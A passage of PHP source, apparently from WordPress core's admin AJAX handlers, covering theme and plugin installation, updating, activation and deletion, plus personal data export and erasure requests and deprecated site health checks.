wp_send_json_error( $status ); } $status['themeName'] = wp_get_theme( $slug )->get( 'Name' ); if ( current_user_can( 'switch_themes' ) ) { if ( is_multisite() ) { $status['activateUrl'] = add_query_arg( array( 'action' => 'enable', '_wpnonce' => wp_create_nonce( 'enable-theme_' . $slug ), 'theme' => $slug, ), network_admin_url( 'themes.php' ) ); } else { $status['activateUrl'] = add_query_arg( array( 'action' => 'activate', '_wpnonce' => wp_create_nonce( 'switch-theme_' . $slug ), 'stylesheet' => $slug, ), admin_url( 'themes.php' ) ); } } $theme = wp_get_theme( $slug ); $status['blockTheme'] = $theme->is_block_theme(); if ( ! is_multisite() && current_user_can( 'edit_theme_options' ) && current_user_can( 'customize' ) ) { $status['customizeUrl'] = add_query_arg( array( 'return' => urlencode( network_admin_url( 'theme-install.php', 'relative' ) ), ), wp_customize_url( $slug ) ); } /* * See WP_Theme_Install_List_Table::_get_theme_status() if we wanted to check * on post-installation status. */ wp_send_json_success( $status ); } /** * Handles updating a theme via AJAX. * * @since 4.6.0 * * @see Theme_Upgrader * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. */ function wp_ajax_update_theme() { check_ajax_referer( 'updates' ); if ( empty( $_POST['slug'] ) ) { wp_send_json_error( array( 'slug' => '', 'errorCode' => 'no_theme_specified', 'errorMessage' => __( 'No theme specified.' ), ) ); } $stylesheet = preg_replace( '/[^A-z0-9_\-]/', '', wp_unslash( $_POST['slug'] ) ); $status = array( 'update' => 'theme', 'slug' => $stylesheet, 'oldVersion' => '', 'newVersion' => '', ); if ( ! current_user_can( 'update_themes' ) ) { $status['errorMessage'] = __( 'Sorry, you are not allowed to update themes for this site.' ); wp_send_json_error( $status ); } $theme = wp_get_theme( $stylesheet ); if ( $theme->exists() ) { $status['oldVersion'] = $theme->get( 'Version' ); } require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php'; $current = get_site_transient( 'update_themes' ); if ( empty( $current ) ) { wp_update_themes(); } $skin = new WP_Ajax_Upgrader_Skin(); $upgrader = new Theme_Upgrader( $skin ); $result = $upgrader->bulk_upgrade( array( $stylesheet ) ); if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) { $status['debug'] = $skin->get_upgrade_messages(); } if ( is_wp_error( $skin->result ) ) { $status['errorCode'] = $skin->result->get_error_code(); $status['errorMessage'] = $skin->result->get_error_message(); wp_send_json_error( $status ); } elseif ( $skin->get_errors()->has_errors() ) { $status['errorMessage'] = $skin->get_error_messages(); wp_send_json_error( $status ); } elseif ( is_array( $result ) && ! empty( $result[ $stylesheet ] ) ) { // Theme is already at the latest version. if ( true === $result[ $stylesheet ] ) { $status['errorMessage'] = $upgrader->strings['up_to_date']; wp_send_json_error( $status ); } $theme = wp_get_theme( $stylesheet ); if ( $theme->exists() ) { $status['newVersion'] = $theme->get( 'Version' ); } wp_send_json_success( $status ); } elseif ( false === $result ) { global $wp_filesystem; $status['errorCode'] = 'unable_to_connect_to_filesystem'; $status['errorMessage'] = __( 'Unable to connect to the filesystem. Please confirm your credentials.' ); // Pass through the error from WP_Filesystem if one was raised. if ( $wp_filesystem instanceof WP_Filesystem_Base && is_wp_error( $wp_filesystem->errors ) && $wp_filesystem->errors->has_errors() ) { $status['errorMessage'] = esc_html( $wp_filesystem->errors->get_error_message() ); } wp_send_json_error( $status ); } // An unhandled error occurred. $status['errorMessage'] = __( 'Theme update failed.' ); wp_send_json_error( $status ); } /** * Handles deleting a theme via AJAX. * * @since 4.6.0 * * @see delete_theme() * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. */ function wp_ajax_delete_theme() { check_ajax_referer( 'updates' ); if ( empty( $_POST['slug'] ) ) { wp_send_json_error( array( 'slug' => '', 'errorCode' => 'no_theme_specified', 'errorMessage' => __( 'No theme specified.' ), ) ); } $stylesheet = preg_replace( '/[^A-z0-9_\-]/', '', wp_unslash( $_POST['slug'] ) ); $status = array( 'delete' => 'theme', 'slug' => $stylesheet, ); if ( ! current_user_can( 'delete_themes' ) ) { $status['errorMessage'] = __( 'Sorry, you are not allowed to delete themes on this site.' ); wp_send_json_error( $status ); } if ( ! wp_get_theme( $stylesheet )->exists() ) { $status['errorMessage'] = __( 'The requested theme does not exist.' ); wp_send_json_error( $status ); } // Check filesystem credentials. `delete_theme()` will bail otherwise. $url = wp_nonce_url( 'themes.php?action=delete&stylesheet=' . urlencode( $stylesheet ), 'delete-theme_' . $stylesheet ); ob_start(); $credentials = request_filesystem_credentials( $url ); ob_end_clean(); if ( false === $credentials || ! WP_Filesystem( $credentials ) ) { global $wp_filesystem; $status['errorCode'] = 'unable_to_connect_to_filesystem'; $status['errorMessage'] = __( 'Unable to connect to the filesystem. Please confirm your credentials.' ); // Pass through the error from WP_Filesystem if one was raised. if ( $wp_filesystem instanceof WP_Filesystem_Base && is_wp_error( $wp_filesystem->errors ) && $wp_filesystem->errors->has_errors() ) { $status['errorMessage'] = esc_html( $wp_filesystem->errors->get_error_message() ); } wp_send_json_error( $status ); } require_once ABSPATH . 'wp-admin/includes/theme.php'; $result = delete_theme( $stylesheet ); if ( is_wp_error( $result ) ) { $status['errorMessage'] = $result->get_error_message(); wp_send_json_error( $status ); } elseif ( false === $result ) { $status['errorMessage'] = __( 'Theme could not be deleted.' ); wp_send_json_error( $status ); } wp_send_json_success( $status ); } /** * Handles installing a plugin via AJAX. * * @since 4.6.0 * * @see Plugin_Upgrader * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. */ function wp_ajax_install_plugin() { check_ajax_referer( 'updates' ); if ( empty( $_POST['slug'] ) ) { wp_send_json_error( array( 'slug' => '', 'errorCode' => 'no_plugin_specified', 'errorMessage' => __( 'No plugin specified.' ), ) ); } $status = array( 'install' => 'plugin', 'slug' => sanitize_key( wp_unslash( $_POST['slug'] ) ), ); if ( ! current_user_can( 'install_plugins' ) ) { $status['errorMessage'] = __( 'Sorry, you are not allowed to install plugins on this site.' ); wp_send_json_error( $status ); } require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php'; require_once ABSPATH . 'wp-admin/includes/plugin-install.php'; $api = plugins_api( 'plugin_information', array( 'slug' => sanitize_key( wp_unslash( $_POST['slug'] ) ), 'fields' => array( 'sections' => false, ), ) ); if ( is_wp_error( $api ) ) { $status['errorMessage'] = $api->get_error_message(); wp_send_json_error( $status ); } $status['pluginName'] = $api->name; $skin = new WP_Ajax_Upgrader_Skin(); $upgrader = new Plugin_Upgrader( $skin ); $result = $upgrader->install( $api->download_link ); if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) { $status['debug'] = $skin->get_upgrade_messages(); } if ( is_wp_error( $result ) ) { $status['errorCode'] = $result->get_error_code(); $status['errorMessage'] = $result->get_error_message(); wp_send_json_error( $status ); } elseif ( is_wp_error( $skin->result ) ) { $status['errorCode'] = $skin->result->get_error_code(); $status['errorMessage'] = $skin->result->get_error_message(); wp_send_json_error( $status ); } elseif ( $skin->get_errors()->has_errors() ) { $status['errorMessage'] = $skin->get_error_messages(); wp_send_json_error( $status ); } elseif ( is_null( $result ) ) { global $wp_filesystem; $status['errorCode'] = 'unable_to_connect_to_filesystem'; $status['errorMessage'] = __( 'Unable to connect to the filesystem. Please confirm your credentials.' ); // Pass through the error from WP_Filesystem if one was raised. if ( $wp_filesystem instanceof WP_Filesystem_Base && is_wp_error( $wp_filesystem->errors ) && $wp_filesystem->errors->has_errors() ) { $status['errorMessage'] = esc_html( $wp_filesystem->errors->get_error_message() ); } wp_send_json_error( $status ); } $install_status = install_plugin_install_status( $api ); $pagenow = isset( $_POST['pagenow'] ) ? sanitize_key( $_POST['pagenow'] ) : ''; // If installation request is coming from import page, do not return network activation link. $plugins_url = ( 'import' === $pagenow ) ? admin_url( 'plugins.php' ) : network_admin_url( 'plugins.php' ); if ( current_user_can( 'activate_plugin', $install_status['file'] ) && is_plugin_inactive( $install_status['file'] ) ) { $status['activateUrl'] = add_query_arg( array( '_wpnonce' => wp_create_nonce( 'activate-plugin_' . $install_status['file'] ), 'action' => 'activate', 'plugin' => $install_status['file'], ), $plugins_url ); } if ( is_multisite() && current_user_can( 'manage_network_plugins' ) && 'import' !== $pagenow ) { $status['activateUrl'] = add_query_arg( array( 'networkwide' => 1 ), $status['activateUrl'] ); } wp_send_json_success( $status ); } /** * Handles activating a plugin via AJAX. * * @since 6.5.0 */ function wp_ajax_activate_plugin() { check_ajax_referer( 'updates' ); if ( empty( $_POST['name'] ) || empty( $_POST['slug'] ) || empty( $_POST['plugin'] ) ) { wp_send_json_error( array( 'slug' => '', 'pluginName' => '', 'plugin' => '', 'errorCode' => 'no_plugin_specified', 'errorMessage' => __( 'No plugin specified.' ), ) ); } $status = array( 'activate' => 'plugin', 'slug' => wp_unslash( $_POST['slug'] ), 'pluginName' => wp_unslash( $_POST['name'] ), 'plugin' => wp_unslash( $_POST['plugin'] ), ); if ( ! current_user_can( 'activate_plugin', $status['plugin'] ) ) { $status['errorMessage'] = __( 'Sorry, you are not allowed to activate plugins on this site.' ); wp_send_json_error( $status ); } if ( is_plugin_active( $status['plugin'] ) ) { $status['errorMessage'] = sprintf( /* translators: %s: Plugin name. */ __( '%s is already active.' ), $status['pluginName'] ); } $activated = activate_plugin( $status['plugin'] ); if ( is_wp_error( $activated ) ) { $status['errorMessage'] = $activated->get_error_message(); wp_send_json_error( $status ); } wp_send_json_success( $status ); } /** * Handles updating a plugin via AJAX. * * @since 4.2.0 * * @see Plugin_Upgrader * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. */ function wp_ajax_update_plugin() { check_ajax_referer( 'updates' ); if ( empty( $_POST['plugin'] ) || empty( $_POST['slug'] ) ) { wp_send_json_error( array( 'slug' => '', 'errorCode' => 'no_plugin_specified', 'errorMessage' => __( 'No plugin specified.' ), ) ); } $plugin = plugin_basename( sanitize_text_field( wp_unslash( $_POST['plugin'] ) ) ); $status = array( 'update' => 'plugin', 'slug' => sanitize_key( wp_unslash( $_POST['slug'] ) ), 'oldVersion' => '', 'newVersion' => '', ); if ( ! current_user_can( 'update_plugins' ) || 0 !== validate_file( $plugin ) ) { $status['errorMessage'] = __( 'Sorry, you are not allowed to update plugins for this site.' ); wp_send_json_error( $status ); } $plugin_data = get_plugin_data( WP_PLUGIN_DIR . '/' . $plugin ); $status['plugin'] = $plugin; $status['pluginName'] = $plugin_data['Name']; if ( $plugin_data['Version'] ) { /* translators: %s: Plugin version. */ $status['oldVersion'] = sprintf( __( 'Version %s' ), $plugin_data['Version'] ); } require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php'; wp_update_plugins(); $skin = new WP_Ajax_Upgrader_Skin(); $upgrader = new Plugin_Upgrader( $skin ); $result = $upgrader->bulk_upgrade( array( $plugin ) ); if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) { $status['debug'] = $skin->get_upgrade_messages(); } if ( is_wp_error( $skin->result ) ) { $status['errorCode'] = $skin->result->get_error_code(); $status['errorMessage'] = $skin->result->get_error_message(); wp_send_json_error( $status ); } elseif ( $skin->get_errors()->has_errors() ) { $status['errorMessage'] = $skin->get_error_messages(); wp_send_json_error( $status ); } elseif ( is_array( $result ) && ! empty( $result[ $plugin ] ) ) { /* * Plugin is already at the latest version. * * This may also be the return value if the `update_plugins` site transient is empty, * e.g. when you update two plugins in quick succession before the transient repopulates. * * Preferably something can be done to ensure `update_plugins` isn't empty. * For now, surface some sort of error here. */ if ( true === $result[ $plugin ] ) { $status['errorMessage'] = $upgrader->strings['up_to_date']; wp_send_json_error( $status ); } $plugin_data = get_plugins( '/' . $result[ $plugin ]['destination_name'] ); $plugin_data = reset( $plugin_data ); if ( $plugin_data['Version'] ) { /* translators: %s: Plugin version. */ $status['newVersion'] = sprintf( __( 'Version %s' ), $plugin_data['Version'] ); } wp_send_json_success( $status ); } elseif ( false === $result ) { global $wp_filesystem; $status['errorCode'] = 'unable_to_connect_to_filesystem'; $status['errorMessage'] = __( 'Unable to connect to the filesystem. Please confirm your credentials.' ); // Pass through the error from WP_Filesystem if one was raised. if ( $wp_filesystem instanceof WP_Filesystem_Base && is_wp_error( $wp_filesystem->errors ) && $wp_filesystem->errors->has_errors() ) { $status['errorMessage'] = esc_html( $wp_filesystem->errors->get_error_message() ); } wp_send_json_error( $status ); } // An unhandled error occurred. $status['errorMessage'] = __( 'Plugin update failed.' ); wp_send_json_error( $status ); } /** * Handles deleting a plugin via AJAX. * * @since 4.6.0 * * @see delete_plugins() * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. */ function wp_ajax_delete_plugin() { check_ajax_referer( 'updates' ); if ( empty( $_POST['slug'] ) || empty( $_POST['plugin'] ) ) { wp_send_json_error( array( 'slug' => '', 'errorCode' => 'no_plugin_specified', 'errorMessage' => __( 'No plugin specified.' ), ) ); } $plugin = plugin_basename( sanitize_text_field( wp_unslash( $_POST['plugin'] ) ) ); $status = array( 'delete' => 'plugin', 'slug' => sanitize_key( wp_unslash( $_POST['slug'] ) ), ); if ( ! current_user_can( 'delete_plugins' ) || 0 !== validate_file( $plugin ) ) { $status['errorMessage'] = __( 'Sorry, you are not allowed to delete plugins for this site.' ); wp_send_json_error( $status ); } $plugin_data = get_plugin_data( WP_PLUGIN_DIR . '/' . $plugin ); $status['plugin'] = $plugin; $status['pluginName'] = $plugin_data['Name']; if ( is_plugin_active( $plugin ) ) { $status['errorMessage'] = __( 'You cannot delete a plugin while it is active on the main site.' ); wp_send_json_error( $status ); } // Check filesystem credentials. `delete_plugins()` will bail otherwise. $url = wp_nonce_url( 'plugins.php?action=delete-selected&verify-delete=1&checked[]=' . $plugin, 'bulk-plugins' ); ob_start(); $credentials = request_filesystem_credentials( $url ); ob_end_clean(); if ( false === $credentials || ! WP_Filesystem( $credentials ) ) { global $wp_filesystem; $status['errorCode'] = 'unable_to_connect_to_filesystem'; $status['errorMessage'] = __( 'Unable to connect to the filesystem. Please confirm your credentials.' ); // Pass through the error from WP_Filesystem if one was raised. if ( $wp_filesystem instanceof WP_Filesystem_Base && is_wp_error( $wp_filesystem->errors ) && $wp_filesystem->errors->has_errors() ) { $status['errorMessage'] = esc_html( $wp_filesystem->errors->get_error_message() ); } wp_send_json_error( $status ); } $result = delete_plugins( array( $plugin ) ); if ( is_wp_error( $result ) ) { $status['errorMessage'] = $result->get_error_message(); wp_send_json_error( $status ); } elseif ( false === $result ) { $status['errorMessage'] = __( 'Plugin could not be deleted.' ); wp_send_json_error( $status ); } wp_send_json_success( $status ); } /** * Handles searching plugins via AJAX. * * @since 4.6.0 * * @global string $s Search term. */ function wp_ajax_search_plugins() { check_ajax_referer( 'updates' ); // Ensure after_plugin_row_{$plugin_file} gets hooked. wp_plugin_update_rows(); $pagenow = isset( $_POST['pagenow'] ) ? sanitize_key( $_POST['pagenow'] ) : ''; if ( 'plugins-network' === $pagenow || 'plugins' === $pagenow ) { set_current_screen( $pagenow ); } /** @var WP_Plugins_List_Table $wp_list_table */ $wp_list_table = _get_list_table( 'WP_Plugins_List_Table', array( 'screen' => get_current_screen(), ) ); $status = array(); if ( ! $wp_list_table->ajax_user_can() ) { $status['errorMessage'] = __( 'Sorry, you are not allowed to manage plugins for this site.' ); wp_send_json_error( $status ); } // Set the correct requester, so pagination works. $_SERVER['REQUEST_URI'] = add_query_arg( array_diff_key( $_POST, array( '_ajax_nonce' => null, 'action' => null, ) ), network_admin_url( 'plugins.php', 'relative' ) ); $GLOBALS['s'] = wp_unslash( $_POST['s'] ); $wp_list_table->prepare_items(); ob_start(); $wp_list_table->display(); $status['count'] = count( $wp_list_table->items ); $status['items'] = ob_get_clean(); wp_send_json_success( $status ); } /** * Handles searching plugins to install via AJAX. * * @since 4.6.0 */ function wp_ajax_search_install_plugins() { check_ajax_referer( 'updates' ); $pagenow = isset( $_POST['pagenow'] ) ? sanitize_key( $_POST['pagenow'] ) : ''; if ( 'plugin-install-network' === $pagenow || 'plugin-install' === $pagenow ) { set_current_screen( $pagenow ); } /** @var WP_Plugin_Install_List_Table $wp_list_table */ $wp_list_table = _get_list_table( 'WP_Plugin_Install_List_Table', array( 'screen' => get_current_screen(), ) ); $status = array(); if ( ! $wp_list_table->ajax_user_can() ) { $status['errorMessage'] = __( 'Sorry, you are not allowed to manage plugins for this site.' ); wp_send_json_error( $status ); } // Set the correct requester, so pagination works. $_SERVER['REQUEST_URI'] = add_query_arg( array_diff_key( $_POST, array( '_ajax_nonce' => null, 'action' => null, ) ), network_admin_url( 'plugin-install.php', 'relative' ) ); $wp_list_table->prepare_items(); ob_start(); $wp_list_table->display(); $status['count'] = (int) $wp_list_table->get_pagination_arg( 'total_items' ); $status['items'] = ob_get_clean(); wp_send_json_success( $status ); } /** * Handles editing a theme or plugin file via AJAX. * * @since 4.9.0 * * @see wp_edit_theme_plugin_file() */ function wp_ajax_edit_theme_plugin_file() { $r = wp_edit_theme_plugin_file( wp_unslash( $_POST ) ); // Validation of args is done in wp_edit_theme_plugin_file(). if ( is_wp_error( $r ) ) { wp_send_json_error( array_merge( array( 'code' => $r->get_error_code(), 'message' => $r->get_error_message(), ), (array) $r->get_error_data() ) ); } else { wp_send_json_success( array( 'message' => __( 'File edited successfully.' ), ) ); } } /** * Handles exporting a user's personal data via AJAX. * * @since 4.9.6 */ function wp_ajax_wp_privacy_export_personal_data() { if ( empty( $_POST['id'] ) ) { wp_send_json_error( __( 'Missing request ID.' ) ); } $request_id = (int) $_POST['id']; if ( $request_id < 1 ) { wp_send_json_error( __( 'Invalid request ID.' ) ); } if ( ! current_user_can( 'export_others_personal_data' ) ) { wp_send_json_error( __( 'Sorry, you are not allowed to perform this action.' ) ); } check_ajax_referer( 'wp-privacy-export-personal-data-' . $request_id, 'security' ); // Get the request. $request = wp_get_user_request( $request_id ); if ( ! $request || 'export_personal_data' !== $request->action_name ) { wp_send_json_error( __( 'Invalid request type.' ) ); } $email_address = $request->email; if ( ! is_email( $email_address ) ) { wp_send_json_error( __( 'A valid email address must be given.' ) ); } if ( ! isset( $_POST['exporter'] ) ) { wp_send_json_error( __( 'Missing exporter index.' ) ); } $exporter_index = (int) $_POST['exporter']; if ( ! isset( $_POST['page'] ) ) { wp_send_json_error( __( 'Missing page index.' ) ); } $page = (int) $_POST['page']; $send_as_email = isset( $_POST['sendAsEmail'] ) ? ( 'true' === $_POST['sendAsEmail'] ) : false; /** * Filters the array of exporter callbacks. * * @since 4.9.6 * * @param array $args { * An array of callable exporters of personal data. Default empty array. * * @type array ...$0 { * Array of personal data exporters. * * @type callable $callback Callable exporter function that accepts an * email address and a page number and returns an * array of name => value pairs of personal data. * @type string $exporter_friendly_name Translated user facing friendly name for the * exporter. * } * } */ $exporters = apply_filters( 'wp_privacy_personal_data_exporters', array() ); if ( ! is_array( $exporters ) ) { wp_send_json_error( __( 'An exporter has improperly used the registration filter.' ) ); } // Do we have any registered exporters? if ( 0 < count( $exporters ) ) { if ( $exporter_index < 1 ) { wp_send_json_error( __( 'Exporter index cannot be negative.' ) ); } if ( $exporter_index > count( $exporters ) ) { wp_send_json_error( __( 'Exporter index is out of range.' ) ); } if ( $page < 1 ) { wp_send_json_error( __( 'Page index cannot be less than one.' ) ); } $exporter_keys = array_keys( $exporters ); $exporter_key = $exporter_keys[ $exporter_index - 1 ]; $exporter = $exporters[ $exporter_key ]; if ( ! is_array( $exporter ) ) { wp_send_json_error( /* translators: %s: Exporter array index. */ sprintf( __( 'Expected an array describing the exporter at index %s.' ), $exporter_key ) ); } if ( ! array_key_exists( 'exporter_friendly_name', $exporter ) ) { wp_send_json_error( /* translators: %s: Exporter array index. */ sprintf( __( 'Exporter array at index %s does not include a friendly name.' ), $exporter_key ) ); } $exporter_friendly_name = $exporter['exporter_friendly_name']; if ( ! array_key_exists( 'callback', $exporter ) ) { wp_send_json_error( /* translators: %s: Exporter friendly name. */ sprintf( __( 'Exporter does not include a callback: %s.' ), esc_html( $exporter_friendly_name ) ) ); } if ( ! is_callable( $exporter['callback'] ) ) { wp_send_json_error( /* translators: %s: Exporter friendly name. */ sprintf( __( 'Exporter callback is not a valid callback: %s.' ), esc_html( $exporter_friendly_name ) ) ); } $callback = $exporter['callback']; $response = call_user_func( $callback, $email_address, $page ); if ( is_wp_error( $response ) ) { wp_send_json_error( $response ); } if ( ! is_array( $response ) ) { wp_send_json_error( /* translators: %s: Exporter friendly name. */ sprintf( __( 'Expected response as an array from exporter: %s.' ), esc_html( $exporter_friendly_name ) ) ); } if ( ! array_key_exists( 'data', $response ) ) { wp_send_json_error( /* translators: %s: Exporter friendly name. */ sprintf( __( 'Expected data in response array from exporter: %s.' ), esc_html( $exporter_friendly_name ) ) ); } if ( ! is_array( $response['data'] ) ) { wp_send_json_error( /* translators: %s: Exporter friendly name. */ sprintf( __( 'Expected data array in response array from exporter: %s.' ), esc_html( $exporter_friendly_name ) ) ); } if ( ! array_key_exists( 'done', $response ) ) { wp_send_json_error( /* translators: %s: Exporter friendly name. */ sprintf( __( 'Expected done (boolean) in response array from exporter: %s.' ), esc_html( $exporter_friendly_name ) ) ); } } else { // No exporters, so we're done. $exporter_key = ''; $response = array( 'data' => array(), 'done' => true, ); } /** * Filters a page of personal data exporter data. Used to build the export report. * * Allows the export response to be consumed by destinations in addition to Ajax. * * @since 4.9.6 * * @param array $response The personal data for the given exporter and page number. * @param int $exporter_index The index of the exporter that provided this data. * @param string $email_address The email address associated with this personal data. * @param int $page The page number for this response. * @param int $request_id The privacy request post ID associated with this request. * @param bool $send_as_email Whether the final results of the export should be emailed to the user. * @param string $exporter_key The key (slug) of the exporter that provided this data. */ $response = apply_filters( 'wp_privacy_personal_data_export_page', $response, $exporter_index, $email_address, $page, $request_id, $send_as_email, $exporter_key ); if ( is_wp_error( $response ) ) { wp_send_json_error( $response ); } wp_send_json_success( $response ); } /** * Handles erasing personal data via AJAX. * * @since 4.9.6 */ function wp_ajax_wp_privacy_erase_personal_data() { if ( empty( $_POST['id'] ) ) { wp_send_json_error( __( 'Missing request ID.' ) ); } $request_id = (int) $_POST['id']; if ( $request_id < 1 ) { wp_send_json_error( __( 'Invalid request ID.' ) ); } // Both capabilities are required to avoid confusion, see `_wp_personal_data_removal_page()`. if ( ! current_user_can( 'erase_others_personal_data' ) || ! current_user_can( 'delete_users' ) ) { wp_send_json_error( __( 'Sorry, you are not allowed to perform this action.' ) ); } check_ajax_referer( 'wp-privacy-erase-personal-data-' . $request_id, 'security' ); // Get the request. $request = wp_get_user_request( $request_id ); if ( ! $request || 'remove_personal_data' !== $request->action_name ) { wp_send_json_error( __( 'Invalid request type.' ) ); } $email_address = $request->email; if ( ! is_email( $email_address ) ) { wp_send_json_error( __( 'Invalid email address in request.' ) ); } if ( ! isset( $_POST['eraser'] ) ) { wp_send_json_error( __( 'Missing eraser index.' ) ); } $eraser_index = (int) $_POST['eraser']; if ( ! isset( $_POST['page'] ) ) { wp_send_json_error( __( 'Missing page index.' ) ); } $page = (int) $_POST['page']; /** * Filters the array of personal data eraser callbacks. * * @since 4.9.6 * * @param array $args { * An array of callable erasers of personal data. Default empty array. * * @type array ...$0 { * Array of personal data exporters. * * @type callable $callback Callable eraser that accepts an email address and a page * number, and returns an array with boolean values for * whether items were removed or retained and any messages * from the eraser, as well as if additional pages are * available. * @type string $exporter_friendly_name Translated user facing friendly name for the eraser. * } * } */ $erasers = apply_filters( 'wp_privacy_personal_data_erasers', array() ); // Do we have any registered erasers? if ( 0 < count( $erasers ) ) { if ( $eraser_index < 1 ) { wp_send_json_error( __( 'Eraser index cannot be less than one.' ) ); } if ( $eraser_index > count( $erasers ) ) { wp_send_json_error( __( 'Eraser index is out of range.' ) ); } if ( $page < 1 ) { wp_send_json_error( __( 'Page index cannot be less than one.' ) ); } $eraser_keys = array_keys( $erasers ); $eraser_key = $eraser_keys[ $eraser_index - 1 ]; $eraser = $erasers[ $eraser_key ]; if ( ! is_array( $eraser ) ) { /* translators: %d: Eraser array index. */ wp_send_json_error( sprintf( __( 'Expected an array describing the eraser at index %d.' ), $eraser_index ) ); } if ( ! array_key_exists( 'eraser_friendly_name', $eraser ) ) { /* translators: %d: Eraser array index. */ wp_send_json_error( sprintf( __( 'Eraser array at index %d does not include a friendly name.' ), $eraser_index ) ); } $eraser_friendly_name = $eraser['eraser_friendly_name']; if ( ! array_key_exists( 'callback', $eraser ) ) { wp_send_json_error( sprintf( /* translators: %s: Eraser friendly name. */ __( 'Eraser does not include a callback: %s.' ), esc_html( $eraser_friendly_name ) ) ); } if ( ! is_callable( $eraser['callback'] ) ) { wp_send_json_error( sprintf( /* translators: %s: Eraser friendly name. */ __( 'Eraser callback is not valid: %s.' ), esc_html( $eraser_friendly_name ) ) ); } $callback = $eraser['callback']; $response = call_user_func( $callback, $email_address, $page ); if ( is_wp_error( $response ) ) { wp_send_json_error( $response ); } if ( ! is_array( $response ) ) { wp_send_json_error( sprintf( /* translators: 1: Eraser friendly name, 2: Eraser array index. */ __( 'Did not receive array from %1$s eraser (index %2$d).' ), esc_html( $eraser_friendly_name ), $eraser_index ) ); } if ( ! array_key_exists( 'items_removed', $response ) ) { wp_send_json_error( sprintf( /* translators: 1: Eraser friendly name, 2: Eraser array index. */ __( 'Expected items_removed key in response array from %1$s eraser (index %2$d).' ), esc_html( $eraser_friendly_name ), $eraser_index ) ); } if ( ! array_key_exists( 'items_retained', $response ) ) { wp_send_json_error( sprintf( /* translators: 1: Eraser friendly name, 2: Eraser array index. */ __( 'Expected items_retained key in response array from %1$s eraser (index %2$d).' ), esc_html( $eraser_friendly_name ), $eraser_index ) ); } if ( ! array_key_exists( 'messages', $response ) ) { wp_send_json_error( sprintf( /* translators: 1: Eraser friendly name, 2: Eraser array index. */ __( 'Expected messages key in response array from %1$s eraser (index %2$d).' ), esc_html( $eraser_friendly_name ), $eraser_index ) ); } if ( ! is_array( $response['messages'] ) ) { wp_send_json_error( sprintf( /* translators: 1: Eraser friendly name, 2: Eraser array index. */ __( 'Expected messages key to reference an array in response array from %1$s eraser (index %2$d).' ), esc_html( $eraser_friendly_name ), $eraser_index ) ); } if ( ! array_key_exists( 'done', $response ) ) { wp_send_json_error( sprintf( /* translators: 1: Eraser friendly name, 2: Eraser array index. */ __( 'Expected done flag in response array from %1$s eraser (index %2$d).' ), esc_html( $eraser_friendly_name ), $eraser_index ) ); } } else { // No erasers, so we're done. $eraser_key = ''; $response = array( 'items_removed' => false, 'items_retained' => false, 'messages' => array(), 'done' => true, ); } /** * Filters a page of personal data eraser data. * * Allows the erasure response to be consumed by destinations in addition to Ajax. * * @since 4.9.6 * * @param array $response { * The personal data for the given exporter and page number. * * @type bool $items_removed Whether items were actually removed or not. * @type bool $items_retained Whether items were retained or not. * @type string[] $messages An array of messages to add to the personal data export file. * @type bool $done Whether the eraser is finished or not. * } * @param int $eraser_index The index of the eraser that provided this data. * @param string $email_address The email address associated with this personal data. * @param int $page The page number for this response. * @param int $request_id The privacy request post ID associated with this request. * @param string $eraser_key The key (slug) of the eraser that provided this data. */ $response = apply_filters( 'wp_privacy_personal_data_erasure_page', $response, $eraser_index, $email_address, $page, $request_id, $eraser_key ); if ( is_wp_error( $response ) ) { wp_send_json_error( $response ); } wp_send_json_success( $response ); } /** * Handles site health checks on server communication via AJAX. * * @since 5.2.0 * @deprecated 5.6.0 Use WP_REST_Site_Health_Controller::test_dotorg_communication() * @see WP_REST_Site_Health_Controller::test_dotorg_communication() */ function wp_ajax_health_check_dotorg_communication() { _doing_it_wrong( 'wp_ajax_health_check_dotorg_communication', sprintf( /* translators: 1: The Site Health action that is no longer used by core. 2: The new function that replaces it. */ __( 'The Site Health check for %1$s has been replaced with %2$s.' ), 'wp_ajax_health_check_dotorg_communication', 'WP_REST_Site_Health_Controller::test_dotorg_communication' ), '5.6.0' ); check_ajax_referer( 'health-check-site-status' ); if ( ! current_user_can( 'view_site_health_checks' ) ) { wp_send_json_error(); } if ( ! class_exists( 'WP_Site_Health' ) ) { require_once ABSPATH . 'wp-admin/includes/class-wp-site-health.php'; } $site_health = WP_Site_Health::get_instance(); wp_send_json_success( $site_health->get_test_dotorg_communication() ); } /** * Handles site health checks on background updates via AJAX. * * @since 5.2.0 * @deprecated 5.6.0 Use WP_REST_Site_Health_Controller::test_background_updates() * @see WP_REST_Site_Health_Controller::test_background_updates() */ function wp_ajax_health_check_background_updates() { _doing_it_wrong( 'wp_ajax_health_check_background_updates', sprintf( /* translators: 1: The Site Health action that is no longer used by core. 2: The new function that replaces it. */ __( 'The Site Health check for %1$s has been replaced with %2$s.' ), 'wp_ajax_health_check_background_updates', 'WP_REST_Site_Health_Controller::test_background_updates' ), '5.6.0' ); check_ajax_referer( 'health-check-site-status' ); if ( ! current_user_can( 'view_site_health_checks' ) ) { wp_send_json_error(); } if ( ! class_exists( 'WP_Site_Health' ) ) { require_once ABSPATH . 'wp-admin/includes/class-wp-site-health.php'; } $site_health = WP_Site_Health::get_instance(); wp_send_json_success( $site_health->get_test_background_updates() ); } /** * Handles site health checks on loopback requests via AJAX. * * @since 5.2.0 * @deprecated 5.6.0 Use WP_REST_Site_Health_Controller::test_loopback_requests() * @see WP_REST_Site_Health_Controller::test_loopback_requests() */ function wp_ajax_health_check_loopback_requests() { _doing_it_wrong( 'wp_ajax_health_check_loopback_requests', sprintf( /* translators: 1: The Site Health action that is no longer used by core. 2: The new function that replaces it. */ __( 'The Site Health check for %1$s has been replaced with %2$s.' ), 'wp_ajax_health_check_loopback_requests', 'WP_REST_Site_Health_Controller::test_loopback_requests' ), '5.6.0' ); check_ajax_referer( 'health-check-site-status' ); if ( ! current_user_can( 'view_site_health_checks' ) ) { wp_send_json_error(); } if ( ! class_exists( 'WP_Site_Health' ) ) { require_once ABSPATH . 'wp-admin/includes/class-wp-site-health.php'; } $site_health = WP_Site_Health::get_instance(); 